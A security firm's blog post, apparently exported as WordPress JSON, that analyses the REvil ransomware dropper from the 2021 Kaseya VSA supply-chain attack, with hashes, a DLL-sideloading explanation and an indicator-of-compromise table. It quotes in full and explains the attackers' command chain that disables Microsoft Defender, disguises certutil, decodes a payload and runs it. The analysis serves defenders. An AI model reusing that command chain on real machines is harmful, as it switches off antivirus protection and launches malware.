{"id":2733,"date":"2021-07-12T10:12:00","date_gmt":"2021-07-12T08:12:00","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=2733"},"modified":"2021-07-12T10:12:00","modified_gmt":"2021-07-12T08:12:00","slug":"analisi-sample-revil-kaseya","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/cyber-security-news\/analisi-sample-revil-kaseya\/","title":{"rendered":"Revil Kaseya sample analysis"},"content":{"rendered":"\n<p style=\"text-align: justify\">On 2 July, Kaseya published an advisory stating that it was under cyber attack, with impact on the VSA suite. This software provides patch management and monitoring of IT infrastructure and systems.<br>In the following days it turned out to be a <strong><em>supply-chain<\/em><\/strong> ransomware attack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2021\/07\/revil-blog.png\" alt=\"\" loading=\"lazy\" \/><figcaption>Criminal blog with ransom demand<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Start of the compromise<\/h2>\n\n\n\n<p style=\"text-align: justify\">The malicious payload was sent to the VSA servers and, in turn, to the VSA Agent applications running on managed Windows devices. This gave Revil and the specific <strong>operator<\/strong> the ability to launch the attack. 
In this way, the criminals:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>started the compromise through a trusted channel;<\/li><li>exploited the trust placed in the VSA agent code, reflected in the <a class=\"ek-link ek-link\" href=\"https:\/\/helpdesk.kaseya.com\/hc\/en-gb\/articles\/229014948-Anti-Virus-Exclusions-and-Trusted-Apps\">anti-malware software exclusions<\/a> required by the Kaseya software.<\/li><\/ul>\n\n\n\n<p style=\"text-align: justify\">Everything executed by the Kaseya Agent Monitor is therefore ignored because of these exclusions, which allowed the criminals to deploy their <em>dropper<\/em> unchecked.<\/p>\n\n\n\n<p style=\"text-align: justify\">To cause greater damage and run undisturbed, the criminals used the Kaseya software to force the antivirus software to be disabled and launched the ransomware with the following command:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>\"C:\\WINDOWS\\system32\\cmd.exe\" \/c ping 127.0.0.1 -n 4979 &gt; nul &amp; C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend &amp; copy \/Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe &amp; echo %RANDOM% &gt;&gt; C:\\Windows\\cert.exe &amp; C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe &amp; del \/q \/f c:\\kworking\\agent.crt C:\\Windows\\cert.exe &amp; c:\\kworking\\agent.exe<\/p><\/blockquote>\n\n\n\n<p><strong>ping 127.0.0.1 -n 4979&gt; nul&nbsp;<\/strong> <br>Used as a timer: it sends a random number (4979 in this case) of echo requests to localhost, with the output redirected to nul.
<br><br> <strong>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend<\/strong> <br>A PowerShell command that turns off Microsoft Defender protection by disabling the following features:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Real-time protection<\/li><li>Network protection against exploitation of known vulnerabilities<\/li><li>Scanning of all downloaded files and attachments<\/li><li>Scanning of scripts<\/li><li>Ransomware protection<\/li><li>Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet<\/li><li>Sharing of potential threat information with Microsoft Active Protection Service (MAPS)<\/li><li>Automatic sample submission to Microsoft<\/li><\/ul>\n\n\n\n<p><strong>copy \/Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe&nbsp;<\/strong> <br>Creates a copy of the Certificate Services utility and places it in <strong>C:\\Windows\\cert.exe<\/strong>.<br>certutil.exe can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs and certificate chains. 
<br><br><strong>echo %RANDOM% &gt;&gt; C:\\Windows\\cert.exe<\/strong> <br>Appends a random number to the end of cert.exe in an attempt to evade security solutions that check the hash of cert.exe.<br><br> <strong>C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe<\/strong> <br>The copy of CERTUTIL is used to decode the Base64-encoded payload in AGENT.CRT and write it to the executable AGENT.EXE in the Kaseya working directory.<br><br> <strong>del \/q \/f c:\\kworking\\agent.crt C:\\Windows\\cert.exe<\/strong> <br>The original payload file C:\\KWORKING\\AGENT.CRT and the copy of CERTUTIL are deleted.<br><br> <strong>c:\\kworking\\agent.exe<\/strong> <br>Finally, the AGENTMON.EXE process runs AGENT.EXE. The new process thus inherits AGENTMON's system privileges, and the dropping of the ransomware begins.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Static Analysis<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Initial file<\/h3>\n\n\n\n<h5 class=\"wp-block-heading\">Tag<\/h5>\n\n\n\n<p> <mark><span style=\"color:#ffffff\" class=\"tadv-color\"><span style=\"background-color:#e91e63\" class=\"tadv-background-color\">Dropper <\/span><\/span><\/mark><\/p>\n\n\n\n<h5 class=\"wp-block-heading\"> Details <\/h5>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"\"><tbody><tr><td> <strong>original name<\/strong>  <\/td><td> AGENT.EXE <\/td><\/tr><tr><td><strong>md5<\/strong><\/td><td>561CFFBABA71A6E8CC1CDCEDA990EAD4<\/td><\/tr><tr><td><strong>sha1<\/strong><\/td><td>5162F14D75E96EDB914D1756349D6E11583DB0B0<\/td><\/tr><tr><td><strong>sha256<\/strong><\/td><td>D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E<\/td><\/tr><tr><td><strong>file-size<\/strong><\/td><td>912264 
(bytes)<\/td><\/tr><tr><td><strong>entropy<\/strong><\/td><td>6.952<\/td><\/tr><tr><td><strong>imphash<\/strong><\/td><td>59349B1648EDDF021C01F05A17A0E870<\/td><\/tr><tr><td><strong>file-type<\/strong><\/td><td>executable<\/td><\/tr><tr><td><strong>cpu<\/strong><\/td><td>32-bit<\/td><\/tr><tr><td><strong>Virustotal<\/strong><\/td><td>score 44\/68<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\">Description<\/h5>\n\n\n\n<p>File signed by <strong>PB03 TRANSPORT LTD<\/strong>, identified as the Revil\/Sodinokibi <em>malware dropper<\/em>. The <strong>dropper<\/strong>'s purpose is to create two files in the hardcoded path &#8220;<strong>C:\\Windows\\<\/strong>&#8221;. The two <em>payloads<\/em> are contained within the dropper itself, referenced as two resources.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-3.png\" alt=\"\" class=\"wp-image-2764\" loading=\"lazy\" \/><figcaption>Resources inside the dropper<\/figcaption><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<h3 class=\"wp-block-heading\">First dropped file<\/h3>\n\n\n\n<h5 class=\"wp-block-heading\">Tag<\/h5>\n\n\n\n<p><span style=\"color:#ffffff\" class=\"tadv-color\"><span style=\"background-color:#0df402\" class=\"tadv-background-color\"> Microsoft Windows Defender <\/span><\/span><\/p>\n\n\n\n<h5 class=\"wp-block-heading\"> Details <\/h5>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"\"><tbody><tr><td><strong>original name<\/strong> <\/td><td> MsMpEng.exe 
<\/td><\/tr><tr><td><strong>md5<\/strong><\/td><td>8CC83221870DD07144E63DF594C391D9<\/td><\/tr><tr><td><strong>sha1<\/strong><\/td><td>3D409B39B8502FCD23335A878F2CBDAF6D721995<\/td><\/tr><tr><td><strong>sha256<\/strong><\/td><td>33BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A<\/td><\/tr><tr><td><strong>file-size<\/strong><\/td><td>22224 (bytes)<\/td><\/tr><tr><td><strong>entropy<\/strong><\/td><td>6.803<\/td><\/tr><tr><td><strong>description<\/strong><\/td><td>Antimalware Service Executable<\/td><\/tr><tr><td><strong>file-type<\/strong><\/td><td>executable<\/td><\/tr><tr><td><strong>cpu<\/strong><\/td><td>32-bit<\/td><\/tr><tr><td><strong>Virustotal<\/strong><\/td><td>score 0\/68<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\">Description<\/h5>\n\n\n\n<p>The file is a legitimate copy of <strong>Microsoft Windows Defender<\/strong>&nbsp;(<strong>MsMpEng.exe<\/strong>). <br>After side-loading the malicious DLL, this copy of Defender is used to carry out the file encryption phase through a legitimate process.<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-4.png\" alt=\"\" class=\"wp-image-2765\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-5.png\" alt=\"\" class=\"wp-image-2767\" loading=\"lazy\" \/><\/figure>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<h3 class=\"wp-block-heading\"> Second dropped file 
<\/h3>\n\n\n\n<h5 class=\"wp-block-heading\">Tag<\/h5>\n\n\n\n<p><span style=\"background-color:#ff0021\" class=\"tadv-background-color\"><span style=\"color:#ffffff\" class=\"tadv-color\">Revil<\/span><\/span><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Details<\/h4>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"\"><tbody><tr><td><strong>original name <\/strong> <\/td><td>MpSvc.dll <\/td><\/tr><tr><td><strong>md5<\/strong><\/td><td>A47CF00AEDF769D60D58BFE00C0B5421<\/td><\/tr><tr><td><strong>sha1<\/strong><\/td><td>656C4D285EA518D90C1B669B79AF475DB31E30B1<\/td><\/tr><tr><td><strong>sha256<\/strong><\/td><td>8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD<\/td><\/tr><tr><td><strong>entropy<\/strong><\/td><td>6.979<\/td><\/tr><tr><td><strong>imphash<\/strong><\/td><td>C699899ABB1119ED2B5C97D5D1D4542E<\/td><\/tr><tr><td><strong>file-type<\/strong><\/td><td>dynamic-link-library<\/td><\/tr><tr><td><strong>cpu<\/strong><\/td><td>32-bit<\/td><\/tr><tr><td><strong>file-size<\/strong><\/td><td>808328 (bytes)<\/td><\/tr><tr><td><strong>Virustotal<\/strong><\/td><td>score 48\/68<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Details<\/h4>\n\n\n\n<p>Malicious DLL containing the Revil <em>payload<\/em>, loaded into the legitimate Windows Defender executable to perform the encryption operations.<br>The DLL exports three functions: <strong>ServiceCrtMain<\/strong>,&nbsp; <strong>ServiceMain<\/strong>, &nbsp;<strong>SvchostPushServiceGlobals<\/strong>.<br>The malicious instructions are retrieved and executed through <strong>ServiceCrtMain<\/strong>.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-6.png\" alt=\"\" class=\"wp-image-2773\" loading=\"lazy\" \/><figcaption>Exports of the malicious DLL<\/figcaption><\/figure><\/div>\n\n\n\n<h2 
class=\"wp-block-heading\"> Indicators of Compromise (IOC)&nbsp; <\/h2>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>Indicator_type<\/strong><\/td><td><strong>Data<\/strong><\/td><td><strong>Note<\/strong><\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\windows\\cert.exe<\/td><td>Copied CERTUTIL<\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\windows\\msmpeng.exe<\/td><td>Outdated Defender executable vulnerable to DLL sideload<\/td><\/tr><tr><td>sha256<\/td><td>33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a<\/td><td>Outdated Defender executable vulnerable to DLL sideload<\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\kworking\\agent.crt<\/td><td>Revil dropper used in Kaseya exploit<\/td><\/tr><tr><td>sha256<\/td><td>d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e<\/td><td>Revil dropper used in Kaseya exploit<\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\windows\\mpsvc.dll<\/td><td>Revil ransomware DLL<\/td><\/tr><tr><td>sha256<\/td><td>8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd<\/td><td>Revil ransomware 
DLL<\/td><\/tr><\/tbody><\/table><\/figure>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":1618,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[28,73,196,212,283],"class_list":["post-2733","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security-news","tag-analysis","tag-code","tag-kaseya","tag-malware","tag-ransomware"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=2733"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2733\/revisions"}],"predecessor-version":[{"id":4249,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2733\/revisions\/4249"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=2733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=2733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\
/v2\/tags?post=2733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}